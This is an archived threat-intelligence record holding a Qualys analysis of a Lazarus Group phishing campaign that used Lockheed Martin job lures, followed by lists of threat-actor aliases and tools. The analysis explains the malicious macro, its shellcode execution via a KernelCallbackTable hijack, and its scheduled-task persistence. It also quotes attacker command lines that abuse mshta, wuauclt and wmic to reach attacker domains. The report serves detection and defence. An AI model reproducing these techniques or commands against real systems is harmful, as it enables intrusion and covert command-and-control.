{ "id": "29bac889-784e-4996-b288-fc0bdabfedee", "created_at": "2026-04-06T00:21:12.703597Z", "updated_at": "2026-04-10T03:38:20.211516Z", "deleted_at": null, "sha1_hash": "96df916bb9feecb42b5ca0ea0553aa6d3228e8c4", "title": "LolZarus: Lazarus Group Incorporating Lolbins into Campaigns", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1332280, "plain_text": "LolZarus: Lazarus Group Incorporating Lolbins into Campaigns\r\nBy Akshat Pradhan\r\nPublished: 2022-02-08 · Archived: 2026-04-05 23:13:31 UTC\r\nQualys Threat Research has identified a new Lazarus campaign using employment phishing lures targeting the\r\ndefence sector. The identified variants target job applicants for Lockheed Martin. This blog details the markers of\r\nthis campaign, including macro content, campaign flow and phishing themes of our identified variants and older\r\nvariants that have been attributed to Lazarus by other vendors.\r\nThe Qualys Research Team recently identified a new Lazarus campaign using employment phishing lures\r\ntargeting the defence sector. The identified variants target job applicants for Lockheed Martin Corporation, which\r\nis an American aerospace, arms, defence, information security, and technology corporation. This is thematically\r\nsimilar to other observed variants where Lazarus has posed as defence companies like Northrop Grumman and\r\nBAE Systems with job openings. We refer to this campaign as “LolZarus” due to the use of different lolbins in\r\nobserved samples, some of which are the lolbin’s first recorded usage by a well-known adversary.\r\nSample Analysis\r\nWe identified two phishing documents: “Lockheed_Martin_JobOpportunities.docx” and\r\n“Salary_Lockheed_Martin_job_opportunities_confidential.doc”. Both variants were authored by the same user,\r\nnamed “Mickey”. The methodology used for control flow hijack and the macro content is similar across both\r\nsamples.\r\nMD5: a27a9324d282d920e495832933d486ee\r\nName: Salary_Lockheed_Martin_job_opportunities_confidential.doc\r\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns\r\nPage 1 of 8\n\nFig1. LockHeed Recruitment Lure\r\nThe macro uses aliases to rename the APIs that it uses (fig. 2).\r\nFig2. Renamed API aliases.\r\nThe initial entry point for the macro is via the ActiveX Frame1_Layout to automatically execute once ActiveX\r\ncontrol is enabled (fig. 3).\r\nFig3. EntryPoint of obfuscated Macro.\r\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns\r\nPage 2 of 8\n\nThe macro starts by loading WMVCORE.DLL, which is a legitimate windows dll for windows media.\r\nInterestingly, to make the macro seem more innocuous, Lazarus uses function names identical to the exported\r\nfunctions of WMVCORE.DLL and variable names thematically related to playback (fig. 4).\r\nFig.4 WMV playback variables and wmvcore.dll function names\r\nThe macro uses a check for a document variable before entering its main functionality block. This variable is set at\r\nthe end to ensure that subsequent opening of the document does not execute it again.\r\nThe second stage payload is shellcode that is embedded as a base64 encoded string array inside the macro that is\r\ndecoded by using CryptStringToBinaryW (fig. 5). Other variants have used the UuidFromStringA function to\r\ndecode the embedded payload and write it to an executable Heap.\r\nFig.5 Payload decoded via CryptStringToBinaryW.\r\nThe decoded shellcode then overwrites the WMIsAvailableOffline function from WMVCORE.dll by retrieving its\r\naddress and changing its memory permissions.\r\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns\r\nPage 3 of 8\n\nFig.6 VirtualProtect and memcpy’s.\r\nThe callback to the shellcode is achieved by retrieving the KernelCallbackTable pointer from the PEB structure of\r\nthe current process via NtQueryInformationProcess, and then patching the _fnDWORD pointer to point to\r\nWMIsAvailableOffline. Whenever winword makes any graphical call, the shellcode executes. This technique to\r\nhijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used\r\nother novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to\r\nshellcode written to executable heap.\r\nThe macro then sets a document variable to ensure that subsequent runs would not execute the shellcode decode\r\nand the KernelCllbackTable hijack again. It also retrieves a decoy document from\r\nhttps://markettrendingcenter[.]com/lk_job_oppor[.]docx and displays it (fig. 7.)\r\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns\r\nPage 4 of 8\n\nFig.7 Decoy Document.\r\nThe shellcode mainly sets up a periodic beacon out to https://markettrendingcenter[.]com/member[.]htm by\r\ncreating a new staging folder C:\\WMAuthorization , writing a vbs file (WMVxEncd.vbs) to it, and creating a\r\ncorresponding Scheduled task to run the vbs file every 20 minutes (fig. 8). shellObj is the Wscript.Shell object that\r\nthe vbs file uses to execute the beacon command.\r\nshellObj.Run \"forfiles /p c:\\windows /m HelpPane.exe /c \"\"mshta C:\\WMAuthorization\\WMPlaybackSrv \"\"ht\r\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns\r\nPage 5 of 8\n\nFig.8 Schedule Task Dump\r\nHere, WMPlaybackSrv is a renamed wscript.exe and WindowsMediaPlayerVxEncdSrv is a renamed mshta.exe.\r\nAnother variant of the campaign uses the lolbin wuauclt.\r\ncmd /C ''C:\\Windows\\system32\\wuauclt.exe' /UpdateDeploymentProvider wuaueng.dll /RunHandlerComServer\r\nEarlier variants have used a copy of wmic.\r\n%COMSPEC% /c Start /miN c:\\Intel\\hidasvc ENVIRONMENT get STATUS /FORMAT:”hxxps://www.advantims[.]com/\r\nAdditional vendors have also identified a variant that uses pcalua.exe.\r\nUnfortunately, we were unable to get further details about the remote htm payload as it returns a 404 error.\r\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns\r\nPage 6 of 8\n\nConclusion\r\nWe attribute this campaign to Lazarus as there is significant overlap in the macro content, campaign flow, and\r\nphishing themes of our identified variants as well as older variants that have been attributed to Lazarus by other\r\nvendors. Additional vendors have reported on the current campaign while attributing it to Lazarus.\r\nLazarus continues to evolve its capabilities by utilizing lesser-known shellcode execution techniques and\r\nincorporating various lolbins as part of its campaign. Qualys will continue to monitor for other similar phishing\r\nlures related to Lazarus.\r\nExisting customers of Qualys can use the following QQL’s to identify this activity:\r\nmitre.attack.technique.id:”Q0026” is\r\nmitre.attack.technique.id:”T1218.005”\r\nmitre.attack.technique.id:”T1202”\r\nmitre.attack.technique.id:”T1036.003”\r\nmitre.attack.technique.id:”T1059.005”\r\nATT\u0026CK Mapping\r\nPhishing: Spearphishing Attachment T1566.001\r\nWindows Management Instrumentation (T1047)\r\nMasquerading: Rename System Utilities (T1036.003)\r\nSigned Binary Proxy Execution: Mshta (T1218.005)\r\nCommand and Scripting Interpreter: Visual Basic (T1059.005)\r\nScheduled Task/Job: Scheduled Task (T1053.005)\r\nNative API (T1106)\r\nHijack Execution Flow (T1574)\r\nCommand and Scripting Interpreter: Windows Command Shell (T1059.003)\r\nIOCS\r\nHashes\r\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns\r\nPage 7 of 8\n\ne87b575b2ddfb9d4d692e3b8627e3921a27a9324d282d920e495832933d486ee3f326da2affb0f7f2a4c5c95ffc660cc490c8\r\nDomains\r\nmarkettrendingcenter.com\r\nlm-career.com\r\nadvantims.com\r\nSource: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns\r\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE" ], "references": [ "https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns" ], "report_names": [ "lolzarus-lazarus-group-incorporating-lolbins-into-campaigns" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434872, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/96df916bb9feecb42b5ca0ea0553aa6d3228e8c4.pdf", "text": "https://archive.orkl.eu/96df916bb9feecb42b5ca0ea0553aa6d3228e8c4.txt", "img": "https://archive.orkl.eu/96df916bb9feecb42b5ca0ea0553aa6d3228e8c4.jpg" } }